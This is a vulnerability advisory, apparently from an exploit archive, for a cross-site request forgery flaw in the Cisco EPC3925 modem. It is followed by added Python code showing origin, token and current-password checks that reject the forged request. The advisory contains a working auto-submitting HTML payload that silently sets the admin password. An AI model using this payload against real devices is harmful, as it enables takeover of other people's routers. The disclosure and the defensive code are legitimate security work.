#######################################################################
# Exploit Title: Cisco EPC3925 - Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925
# CVE: N/A
#######################################################################
# Description:
#
# This proof of concept demonstrates that the admin password can be
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC:
#
# <html>
#
# <form name="reseller" method="POST"
#       action="http://[target]/goform/Quick_setup" id="csrf_attack"
#       target="csrf_iframe">
# <input type="hidden" name="Password" value="attackers_password">
# <input type="hidden" name="PasswordReEnter" value="attackers_password">
# <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
# document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html>
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/
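
The server-side checks whose absence the description and side note point to, as an added example that is not part of the original advisory and is not Cisco's code. The `csrf_token` and `CurrentPassword` fields, the session dictionary and the plaintext password comparison are assumptions made for illustration; only `Password`, `PasswordReEnter` and `save` come from the advisory.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions: csrf_token and CurrentPassword are hypothetical fields, not part
# of the real device form. A real device would compare password hashes; plain
# strings are used here only to keep the example short.

def new_csrf_token() -> str:
    """Per-session random token, embedded in the form the device serves."""
    return secrets.token_urlsafe(32)

def _eq(a: str, b: str) -> bool:
    """Constant-time string comparison."""
    return hmac.compare_digest(a.encode(), b.encode())

def same_origin(headers: dict) -> bool:
    """Origin (or Referer as fallback) must name the host that was requested."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc.lower() == headers.get("Host", "").lower()

def check_password_change(method, headers, form, session, admin_password):
    """Return (allowed, reason) for a request to /goform/Quick_setup."""
    if method != "POST":
        return False, "method"
    if not same_origin(headers):
        return False, "cross-origin request"
    token = form.get("csrf_token", "")
    if not token or not _eq(token, session.get("csrf_token", "")):
        return False, "bad csrf token"
    if not _eq(form.get("CurrentPassword", ""), admin_password):
        return False, "current password required"
    if not form.get("Password") or form["Password"] != form.get("PasswordReEnter"):
        return False, "new password mismatch"
    return True, "ok"

# Constructed sample requests (not captured traffic).
SESSION = {"csrf_token": new_csrf_token()}
FORGED = {
    "headers": {"Host": "192.168.0.1", "Origin": "http://attacker.example"},
    "form": {"Password": "x", "PasswordReEnter": "x", "save": "Save Settings"},
}
LEGIT = {
    "headers": {"Host": "192.168.0.1", "Origin": "http://192.168.0.1"},
    "form": {"Password": "n3w-pass", "PasswordReEnter": "n3w-pass", "save": "Save Settings",
             "CurrentPassword": "old-pass", "csrf_token": SESSION["csrf_token"]},
}
```

`FORGED` has the shape of the request the advisory's form produces and is rejected at the origin check; stripping the token or the current password from `LEGIT` is rejected at the later checks.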